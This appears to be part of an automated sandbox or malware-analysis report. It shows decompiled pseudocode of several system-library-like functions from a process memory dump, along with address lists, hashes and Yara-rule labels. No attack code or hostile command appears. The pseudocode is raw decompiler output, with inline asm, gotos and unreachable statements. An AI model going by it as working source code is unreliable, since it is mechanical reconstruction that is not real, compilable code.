0x0360efd0
0x0360f0a6
0x00000000
0x00000000
0x0360f0af
0x0365bb06
0x0365bb0a
0x0360f0b5
0x0360f0b5
0x0360f0b5
0x0360f0b5
0x00000000
0x0360efd6
0x0360efd9
0x0360f0de
0x0360f0e2
0x0360efdf
0x0360efdf
0x0360efdf
0x0360efe5
0x0365bafc
0x0365bafc
0x0360efe5
0x0360efeb
0x0360efed
0x0360f00f
0x0360f011
0x0360f01a
0x0360f01d
0x0360f021
0x0360f028
0x0360f029
0x0360f029
0x0360f02c
0x00000000
0x0360f02c
0x0360eff3
0x0360eff9
0x0360f0ea
0x0360f0ed
0x0360f0ef
0x00000000
0x0360f0ef
0x0360f003
0x0365bb12
0x0360f045
0x0360f049
0x0360f051
0x0360f09e
0x0360f0a0
0x0360f0a0
0x0360f09e
0x0360f053
0x0360f064
0x0360f064
0x0360f06b
0x0365bb1a
0x0365bb1a
0x0360f071
0x0360f071
0x0360f07d
0x0360f082
0x0360f08f
0x0360f08f
0x0360f009
0x0360f00d
0x00000000
0x0360f00d
0x0360efd0
0x0360ef97
0x0360efa5
0x0360efaa
0x00000000
0x0360efac
0x0360efac
0x0360efac
0x00000000
0x0360efb2
0x0360f036
0x0360f03a
0x0360f040
0x0360f090
0x00000000
0x0360f092
0x0360f042
0x00000000
0x0360f042
0x0360efb7
0x0360efb9
0x0360efbc
0x0360efb0
0x0360efb0
0x00000000
0x0360efbe
0x0360efbe
0x0360efc1
0x00000000
0x0360efc1
0x0360efbc
0x0360efaa
0x0360ef91

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 963c0357271620a78e5a404eaca3b23863dfe97a871552fe12ba0f8feec3c8bf
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 8751F330E046599FDB28CB68C3A27AFFBB1AF05314F1C81A8D4469B3C1D776A989C741

Uniqueness

Uniqueness Score: -1.00%

Function 036C740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E036C740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0364D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0363F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03614620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03614620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0363F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03614620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x036c740d
0x036c740d
0x036c7412
0x036c7413
0x036c7416
0x036c7418
0x036c741c
0x036c741f
0x036c7422
0x036c7422
0x036c7428
0x036c742a
0x036c742a
0x036c7451
0x036c7432
0x036c744f
0x036c744f
0x00000000
0x036c7434
0x036c7438
0x036c7443
0x036c7517
0x036c7517
0x036c751a
0x036c7535
0x036c7520
0x036c7527
0x036c752c
0x036c7531
0x036c7533
0x00000000
0x036c7533
0x00000000
0x036c7531
0x036c754b
0x036c754f
0x036c755c
0x036c755c
0x036c755f
0x036c7560
0x036c7561
0x036c7562
0x036c7563
0x036c7568
0x036c756a
0x036c756c
0x036c756d
0x036c756d
0x036c756f
0x036c7572
0x036c7574
0x036c7577
0x036c757c
0x036c757f
0x00000000
0x036c7551
0x036c7551
0x036c7551
0x036c7553
0x036c7553
0x036c7449
0x036c7449
0x036c744c
0x036c744c
0x00000000
0x036c744c
0x036c7443
0x036c750e
0x036c7514
0x036c7514
0x036c7455
0x036c7469
0x036c746d
0x00000000
0x036c7473
0x036c7473
0x036c7476
0x036c7480
0x036c7484
0x036c748e
0x036c7493
0x036c7493
0x036c7496
0x036c7499
0x036c74a1
0x036c74b1
0x036c74b5
0x00000000
0x036c74bb
0x036c74c1
0x036c74c1
0x036c74c4
0x036c74c5
0x036c74c6
0x036c74c7
0x036c74c8
0x036c74cd
0x00000000
0x036c74d3
0x036c74d3
0x036c74d6
0x036c74d8
0x036c74db
0x036c74dd
0x036c74e0
0x036c74e7
0x036c74ee
0x036c74ee
0x036c74f4
0x036c74f9
0x00000000
0x036c74fb
0x036c74fb
0x036c74fd
0x036c7500
0x036c7503
0x036c7505
0x036c7505
0x036c74f9
0x00000000
0x036c74cd
0x036c74b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: d27e99589998b663b2fac0cb858a79883e61d5c3498a8995d79d4c1696165956
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: C6516C71610646EFDB15CF14D580AA6BBB9FF45304F18C0AEE9089F212E771E946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03622990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E03622990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x36cff00);
				E0364D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x35d1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0363E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x35d1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E036751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x35d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E03622AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E03606600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E03622C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0360EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E03622AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E03622C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E03622ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0364D0D1(_t62);
				goto L28;
			}

0x03622990
0x03622992
0x03622997
0x036229a3
0x036229a6
0x036229ab
0x036229ad
0x036229b2
0x03665c80
0x036229b8
0x036229b8
0x036229bb
0x036229c0
0x036229c5
0x036229c6
0x036229c6
0x036229cb
0x00000000
0x00000000
0x036229cd
0x036229d0
0x036229d9
0x036229db
0x036229dd
0x03622a7f
0x03622a84
0x03622a87
0x03622a89
0x03665ca1
0x03665ca3
0x00000000
0x03622a8f
0x03622a8f
0x00000000
0x03622a8f
0x00000000
0x036229e3
0x036229e3
0x036229e3
0x00000000
0x036229e3
0x036229dd
0x00000000
0x036229db
0x036229e6
0x036229e9
0x036229eb
0x036229ed
0x036229f3
0x036229f5
0x036229f8
0x036229fa
0x03622a97
0x03622a9a
0x03622a9d
0x03622add
0x00000000
0x03622a9f
0x03622aa2
0x03622aa5
0x03622aa8
0x03622aab
0x03665cab
0x03665caf
0x03665cc5
0x03665cda
0x03665cdc
0x03665cdf
0x03665ce5
0x00000000
0x03665ceb
0x03665ced
0x03665cee
0x00000000
0x03665cee
0x03665cb1
0x03665cb4
0x03665cb9
0x03665cbb
0x00000000
0x03665cbd
0x03665cbd
0x00000000
0x03665cbd
0x03665cbb
0x03622ab1
0x03622ab1
0x03622ac4
0x03622ac6
0x03622ac6
0x00000000
0x03622ac6
0x03622aab
0x00000000
0x03622a00
0x03622a09
0x03622a0e
0x03622a21
0x03622a24
0x03622a35
0x03622a3a
0x03622a3d
0x03622a42
0x03622a59
0x03622a59
0x03622a5c
0x03622a5f
0x03622a5f
0x036229fa
0x036229f3
0x03622a64
0x03622a64
0x03622a6b
0x03622a6b
0x03622a6d
0x03622a72
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f9f2e368994c1738ecb2f297b60f93c5ec03862802111c94088e5ddf4693b34
Instruction ID: 7ddded3d2b422fcb539de03005398c116193d79b1d06655458643578889ec7fb
Opcode Fuzzy Hash: 1f9f2e368994c1738ecb2f297b60f93c5ec03862802111c94088e5ddf4693b34
Instruction Fuzzy Hash: 29517831A00629DFCF65DF55C990AEEBFB5BF08310F068459E811AB360C3718952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03624BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E03624BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x36ed360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E035FCC50(_t86);
					L11:
					return E0363B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x36e8504
				E03612280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0363FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0363B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L03614620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E035FCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x36e8504
								E0360FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E03624F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x03624bad
0x03624bbf
0x03624bc2
0x03624bc6
0x03624bcd
0x03624bd9
0x036667fe
0x03666800
0x03624ccc
0x03624ccd
0x03624cb7
0x03624cc9
0x03624cc9
0x03624bdf
0x03624be5
0x00000000
0x00000000
0x03624beb
0x03624bef
0x00000000
0x00000000
0x03624bf5
0x03624bf9
0x03624c06
0x03624c0b
0x03624c17
0x03624c1c
0x03624c1f
0x03624c25
0x03624c33
0x03624c3d
0x03624c40
0x03624c43
0x03624c47
0x03624c4d
0x03624c53
0x03624c54
0x03624c55
0x03624c56
0x03624c5b
0x03624c5c
0x03624c63
0x03624c6b
0x00000000
0x00000000
0x03666776
0x03666784
0x03666784
0x0366679f
0x036667a7
0x036667af
0x036667ce
0x00000000
0x036667b1
0x036667b7
0x036667b8
0x036667c1
0x036667d3
0x036667d9
0x036667dd
0x03624c94
0x03624c94
0x03624c98
0x03624c9c
0x03624ca3
0x036667f4
0x036667f4
0x03624cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x03624cb5
0x03624c79
0x03624c7e
0x03624c89
0x03624c8b
0x03624c8f
0x03624c8f
0x00000000
0x03624c89
0x036667c3
0x00000000
0x036667c3
0x036667af
0x03624c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad6773bc0baafbd4bd8ebcfb1ef520cc33fdc77445d27d5ea0b0de202ecbd5d
Instruction ID: 0db57f85fee53c76f7b4ce5567881a1ab5ec9f7392513e1723c99faa984c600a
Opcode Fuzzy Hash: fad6773bc0baafbd4bd8ebcfb1ef520cc33fdc77445d27d5ea0b0de202ecbd5d
Instruction Fuzzy Hash: 8741A635A006289BCB21DF69D944BEEBBB8EF45740F0504A9E908AB350DB74DE85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 03624D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E03624D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x36ed360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0363FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x36e7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0363B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L03614620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E035FCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0363B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0363F380(_t67 + 0xc, 0x35d5138, 0x10) == 0) {
								 *0x36e60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E03624F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E03624E70(0x36e86b0, 0x3625690, 0, 0) != 0) {
					_t46 = E035FCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x03624d3b
0x03624d4d
0x03624d53
0x03624d58
0x03624d65
0x03624d6c
0x03624d71
0x03624d77
0x03624d7f
0x03624d8c
0x03624d8e
0x03624dad
0x03624db0
0x03624db7
0x03624db8
0x03624db9
0x03624dba
0x03624dbb
0x03624dc1
0x03624dc8
0x03624dcc
0x03624dd5
0x03624dde
0x03624ddf
0x03624de0
0x03624de1
0x03624de6
0x03624de7
0x03624de9
0x03624df3
0x00000000
0x00000000
0x03666c7c
0x03666c8a
0x03666c8a
0x03666c9d
0x03666ca7
0x03666cac
0x03666cb2
0x03666cb9
0x00000000
0x03666cbf
0x03666cbf
0x00000000
0x03666cbf
0x03666cb9
0x03624dfb
0x03666ccf
0x03666cd3
0x03624e32
0x03624e39
0x03666ce0
0x03666cf2
0x03666cf2
0x03666ce0
0x03624e3f
0x03624e41
0x03624e51
0x03624e51
0x03624e03
0x03624e03
0x03624e09
0x03624e0f
0x03624e57
0x00000000
0x00000000
0x03624e1b
0x03624e30
0x03624e5b
0x03624e5b
0x00000000
0x03624e30
0x03624e11
0x03624e11
0x03624e16
0x00000000
0x03624e16
0x03624e01
0x00000000
0x03624e01
0x03624da5
0x03666c6b
0x00000000
0x03624dab
0x03624dab
0x00000000
0x03624dab

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4291690c4f9c23962c1d6cbc51104363f2349ce083e861ad64336fcf64a834
Instruction ID: b23b9b155c40ff4745d0619a03f900630a1f39c5eb1db203a2b18cd4f5d4a1dd
Opcode Fuzzy Hash: 4f4291690c4f9c23962c1d6cbc51104363f2349ce083e861ad64336fcf64a834
Instruction Fuzzy Hash: FF41F475A40B289FEB32DF15CD80FAABBA9EB45710F0500A9E9459B380DB70DD44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03608A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03608A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x36ed360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0363B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0360E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x35d1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E03621DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E03633C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E03608999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x03608a0a
0x03608a1c
0x03608a23
0x03608a2e
0x03608a30
0x03608a36
0x03608a3c
0x03608a3e
0x03608a4a
0x03608a52
0x03608a9c
0x03608aae
0x03608a58
0x03608a5e
0x03608a6a
0x03608a6f
0x03608a75
0x03608a7d
0x03608a85
0x03608a86
0x03608a89
0x03608a93
0x03608a99
0x03608a9b
0x00000000
0x03608aaf
0x03608abe
0x03608ac3
0x03608acb
0x03608ad7
